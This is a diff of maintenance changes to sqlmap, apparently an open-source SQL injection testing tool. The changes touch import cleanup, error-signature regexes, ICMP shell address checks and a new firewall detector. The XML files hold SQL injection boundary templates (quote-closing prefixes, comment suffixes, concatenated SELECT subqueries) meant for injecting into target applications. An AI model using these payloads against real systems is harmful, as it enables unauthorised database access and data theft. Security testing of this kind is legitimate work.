VALID_TIME_CHARS_RUN_THRESHOLD = 100 VALID_TIME_CHARS_RUN_THRESHOLD = 100

2
lib/core/threads.py
View File

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
""" """
import difflib import difflib
import random
import threading import threading
import time import time
import traceback import traceback
@@ -51,6 +52,7 @@ class _ThreadData(threading.local):
self.lastRequestMsg = None self.lastRequestMsg = None
self.lastRequestUID = 0 self.lastRequestUID = 0
self.lastRedirectURL = None self.lastRedirectURL = None
self.random = random.WichmannHill()
self.resumed = False self.resumed = False
self.retriesCount = 0 self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None) self.seqMatcher = difflib.SequenceMatcher(None)

1
lib/core/wordlist.py
View File

@@ -11,7 +11,6 @@ import zipfile
from lib.core.common import getSafeExString from lib.core.common import getSafeExString
from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapInstallationException
from lib.core.settings import UNICODE_ENCODING
class Wordlist(object): class Wordlist(object):
""" """

3
lib/parse/cmdline.py
View File

@@ -763,9 +763,6 @@ def cmdLineParser(argv=None):
parser.add_option("--binary-fields", dest="binaryFields", parser.add_option("--binary-fields", dest="binaryFields",
help=SUPPRESS_HELP) help=SUPPRESS_HELP)
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
help=SUPPRESS_HELP)
parser.add_option("--force-dns", dest="forceDns", action="store_true", parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP) help=SUPPRESS_HELP)

14
lib/parse/html.py
View File

@@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
ContentHandler.__init__(self) ContentHandler.__init__(self)
self._dbms = None self._dbms = None
self._page = page self._page = (page or "")
self._lower_page = self._page.lower()
self.dbms = None self.dbms = None
@@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
threadData.lastErrorPage = (threadData.lastRequestUID, self._page) threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
def startElement(self, name, attrs): def startElement(self, name, attrs):
if self.dbms:
return
if name == "dbms": if name == "dbms":
self._dbms = attrs.get("value") self._dbms = attrs.get("value")
elif name == "error": elif name == "error":
if re.search(attrs.get("regexp"), self._page, re.I): regexp = attrs.get("regexp")
if regexp not in kb.cache.regex:
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
keywords = sorted(keywords, key=len)
kb.cache.regex[regexp] = keywords[-1].lower()
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
self.dbms = self._dbms self.dbms = self._dbms
self._markAsErrorPage() self._markAsErrorPage()

2
lib/request/basic.py
View File

@@ -150,7 +150,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding return encoding
# Reference: http://www.destructor.de/charsets/index.htm # Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"} translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('): for delimiter in (';', ',', '('):
if delimiter in encoding: if delimiter in encoding:

3
lib/request/connect.py
View File

@@ -32,7 +32,6 @@ from lib.core.agent import agent
from lib.core.common import asciifyUrl from lib.core.common import asciifyUrl
from lib.core.common import calculateDeltaSeconds from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine from lib.core.common import clearConsoleLine
from lib.core.common import cpuThrottle
from lib.core.common import dataToStdout from lib.core.common import dataToStdout
from lib.core.common import evaluateCode from lib.core.common import evaluateCode
from lib.core.common import extractRegexResult from lib.core.common import extractRegexResult
@@ -220,8 +219,6 @@ class Connect(object):
if isinstance(conf.delay, (int, float)) and conf.delay > 0: if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay) time.sleep(conf.delay)
elif conf.cpuThrottle:
cpuThrottle(conf.cpuThrottle)
if conf.offline: if conf.offline:
return None, None, None return None, None, None

20
lib/takeover/icmpsh.py
View File

@@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
""" """
import os import os
import re
import socket
import time import time
from extra.icmpsh.icmpsh_m import main as icmpshmaster from extra.icmpsh.icmpsh_m import main as icmpshmaster
@@ -54,15 +56,29 @@ class ICMPsh:
if self.localIP: if self.localIP:
message += "[Enter for '%s' (detected)] " % self.localIP message += "[Enter for '%s' (detected)] " % self.localIP
while not address: valid = None
address = readInput(message, default=self.localIP) while not valid:
valid = True
address = readInput(message, default=self.localIP or "")
try:
socket.inet_aton(address)
except socket.error:
valid = False
finally:
valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
if conf.batch and not address: if conf.batch and not address:
raise SqlmapDataException("local host address is missing") raise SqlmapDataException("local host address is missing")
elif address and not valid:
warnMsg = "invalid local host address"
logger.warn(warnMsg)
return address return address
def _prepareIngredients(self, encode=True): def _prepareIngredients(self, encode=True):
self.localIP = getattr(self, "localIP", None)
self.remoteIP = getattr(self, "remoteIP", None)
self.lhostStr = ICMPsh._selectLhost(self) self.lhostStr = ICMPsh._selectLhost(self)
self.rhostStr = ICMPsh._selectRhost(self) self.rhostStr = ICMPsh._selectRhost(self)

5
lib/techniques/blind/inference.py
View File

@@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import re
import threading import threading
import time import time
from extra.safe2bin.safe2bin import safechardecode
from extra.safe2bin.safe2bin import safecharencode from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent from lib.core.agent import agent
from lib.core.common import Backend from lib.core.common import Backend
@@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
from lib.core.common import filterControlChars from lib.core.common import filterControlChars
from lib.core.common import getCharset from lib.core.common import getCharset
from lib.core.common import getCounter from lib.core.common import getCounter
from lib.core.common import getUnicode
from lib.core.common import goGoodSamaritan from lib.core.common import goGoodSamaritan
from lib.core.common import getPartRun from lib.core.common import getPartRun
from lib.core.common import hashDBRetrieve from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter from lib.core.common import incrementCounter
from lib.core.common import randomInt
from lib.core.common import safeStringFormat from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf from lib.core.data import conf
@@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import MAX_BISECTION_LENGTH from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import NULL from lib.core.settings import NULL

3
lib/utils/hash.py
View File

@@ -45,6 +45,7 @@ from lib.core.common import dataToStdout
from lib.core.common import getFileItems from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode from lib.core.common import normalizeUnicode
@@ -490,7 +491,7 @@ def attackDumpedTable():
for (_, hash_, password) in results: for (_, hash_, password) in results:
if hash_: if hash_:
lut[hash_.lower()] = password lut[hash_.lower()] = getUnicode(password)
infoMsg = "postprocessing table dump" infoMsg = "postprocessing table dump"
logger.info(infoMsg) logger.info(infoMsg)

2
lib/utils/hashdb.py
View File

@@ -66,7 +66,7 @@ class HashDB(object):
@staticmethod @staticmethod
def hashKey(key): def hashKey(key):
key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
retVal = int(hashlib.md5(key).hexdigest()[:12], 16) retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400
return retVal return retVal
def retrieve(self, key, unserialize=False): def retrieve(self, key, unserialize=False):

3
lib/utils/search.py
View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import cookielib
import httplib import httplib
import re import re
import socket import socket
@@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
from lib.core.enums import REDIRECTION from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DUMMY_SEARCH_USER_AGENT from lib.core.settings import DUMMY_SEARCH_USER_AGENT
from lib.core.settings import DUCKDUCKGO_REGEX from lib.core.settings import DUCKDUCKGO_REGEX
@@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler
from thirdparty.socks import socks from thirdparty.socks import socks

8
plugins/generic/databases.py
View File

@@ -572,7 +572,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
else: else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
logger.info(infoMsg)
else: else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments" warnMsg += "possible to get column comments"
@@ -702,7 +706,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
else: else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
logger.info(infoMsg)
else: else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments" warnMsg += "possible to get column comments"

3
sqlmap.py
View File

@@ -85,6 +85,7 @@ def main():
raise SystemExit raise SystemExit
setPaths() setPaths()
banner()
# Store original command line options for possible later restoration # Store original command line options for possible later restoration
cmdLineOptions.update(cmdLineParser().__dict__) cmdLineOptions.update(cmdLineParser().__dict__)
@@ -97,8 +98,6 @@ def main():
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
setRestAPILog() setRestAPILog()
banner()
conf.showTime = True conf.showTime = True
dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)

2
tamper/commalesslimit.py
View File

@@ -5,10 +5,8 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import os
import re import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH __priority__ = PRIORITY.HIGH

3
tamper/escapequotes.py
View File

@@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import base64
from lib.core.enums import PRIORITY from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOWEST __priority__ = PRIORITY.LOWEST

13
thirdparty/colorama/initialise.py vendored
View File

@@ -21,13 +21,15 @@ def reset_all():
def init(autoreset=False, convert=None, strip=None, wrap=True): def init(autoreset=False, convert=None, strip=None, wrap=True):
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
if orig_stdout is not None:
return
if not wrap and any([autoreset, convert, strip]): if not wrap and any([autoreset, convert, strip]):
raise ValueError('wrap=False conflicts with any other arg=True') raise ValueError('wrap=False conflicts with any other arg=True')
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
orig_stdout = sys.stdout orig_stdout = sys.stdout
orig_stderr = sys.stderr orig_stderr = sys.stderr
@@ -49,10 +51,15 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
def deinit(): def deinit():
global orig_stdout
global orig_stderr
if orig_stdout is not None: if orig_stdout is not None:
sys.stdout = orig_stdout sys.stdout = orig_stdout
orig_stdout = None
if orig_stderr is not None: if orig_stderr is not None:
sys.stderr = orig_stderr sys.stderr = orig_stderr
orig_stderr = None
@contextlib.contextmanager @contextlib.contextmanager

2
waf/baidu.py
View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS: for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector) _, headers, _ = get_page(get=vector)
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval: if retval:
break break

24
waf/nsfocus.py Normal file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NSFOCUS Web Application Firewall (NSFOCUS)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"NSFocus", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break
return retval

125
xml/boundaries.xml
View File

@@ -31,6 +31,7 @@ Tag: <boundary>
6: TOP 6: TOP
7: Table name 7: Table name
8: Column name 8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible. A comma separated list of these values is also possible.
@@ -80,7 +81,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>)</prefix> <prefix>)</prefix>
<suffix></suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -89,7 +90,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>')</prefix> <prefix>')</prefix>
<suffix></suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -98,7 +99,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>'</prefix> <prefix>'</prefix>
<suffix></suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -107,7 +108,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>4</ptype> <ptype>4</ptype>
<prefix>"</prefix> <prefix>"</prefix>
<suffix></suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<!-- End of generic boundaries --> <!-- End of generic boundaries -->
@@ -406,7 +407,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix></prefix> <prefix></prefix>
<suffix>-- [RANDSTR]</suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -422,56 +423,92 @@ Formats:
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"--> <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
<boundary> <boundary>
<level>5</level> <level>5</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
<level>5</level> <level>5</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
<level>4</level> <level>4</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
<level>4</level> <level>4</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
<level>5</level> <level>5</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>4</ptype> <ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
<level>4</level> <level>4</level>
<clause>1</clause> <clause>9</clause>
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary> </boundary>
<!-- End of pre-WHERE generic boundaries --> <!-- End of pre-WHERE generic boundaries -->
@@ -482,7 +519,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -491,7 +528,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -500,7 +537,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -509,7 +546,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>2</ptype> <ptype>2</ptype>
<prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -518,7 +555,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>4</ptype> <ptype>4</ptype>
<prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -527,7 +564,7 @@ Formats:
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -536,7 +573,7 @@ Formats:
<where>1</where> <where>1</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<boundary> <boundary>
@@ -545,48 +582,10 @@ Formats:
<where>1</where> <where>1</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix> <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix> <suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary> </boundary>
<!-- End of pre-WHERE derived table boundaries --> <!-- End of pre-WHERE derived table boundaries -->
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of INSERT/UPDATE generic boundaries -->
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) --> <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
<boundary> <boundary>
<level>4</level> <level>4</level>

8
xml/errors.xml
View File

@@ -7,6 +7,7 @@
<error regexp="Warning.*mysql_.*"/> <error regexp="Warning.*mysql_.*"/>
<error regexp="MySqlException \(0x"/> <error regexp="MySqlException \(0x"/>
<error regexp="valid MySQL result"/> <error regexp="valid MySQL result"/>
<error regexp="check the manual that corresponds to your MySQL server version"/>
<error regexp="MySqlClient\."/> <error regexp="MySqlClient\."/>
<error regexp="com\.mysql\.jdbc\.exceptions"/> <error regexp="com\.mysql\.jdbc\.exceptions"/>
</dbms> </dbms>
@@ -31,6 +32,7 @@
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/> <error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/> <error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/> <error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
<error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
</dbms> </dbms>
<!-- Microsoft Access --> <!-- Microsoft Access -->
@@ -43,7 +45,7 @@
<!-- Oracle --> <!-- Oracle -->
<dbms value="Oracle"> <dbms value="Oracle">
<error regexp="\bORA-[0-9][0-9][0-9][0-9]"/> <error regexp="\bORA-\d{5}"/>
<error regexp="Oracle error"/> <error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/> <error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/> <error regexp="Warning.*\Woci_.*"/>
@@ -55,7 +57,7 @@
<error regexp="CLI Driver.*DB2"/> <error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/> <error regexp="DB2 SQL error"/>
<error regexp="\bdb2_\w+\("/> <error regexp="\bdb2_\w+\("/>
<error regexp="(?i)SQLSTATE.+SQLCODE"/> <error regexp="SQLSTATE.+SQLCODE"/>
</dbms> </dbms>
<!-- Informix --> <!-- Informix -->
@@ -87,7 +89,7 @@
<!-- Sybase --> <!-- Sybase -->
<dbms value="Sybase"> <dbms value="Sybase">
<error regexp="(?i)Warning.*sybase.*"/> <error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/> <error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/> <error regexp="Sybase.*Server message.*"/>
<error regexp="SybSQLException"/> <error regexp="SybSQLException"/>

13
xml/payloads/01_boolean_blind.xml
View File

@@ -53,6 +53,7 @@ Tag: <test>
6: TOP 6: TOP
7: Table name 7: Table name
8: Column name 8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible. A comma separated list of these values is also possible.
@@ -159,7 +160,7 @@ Tag: <test>
<stype>1</stype> <stype>1</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [INFERENCE]</vector> <vector>AND [INFERENCE]</vector>
<request> <request>
@@ -175,7 +176,7 @@ Tag: <test>
<stype>1</stype> <stype>1</stype>
<level>1</level> <level>1</level>
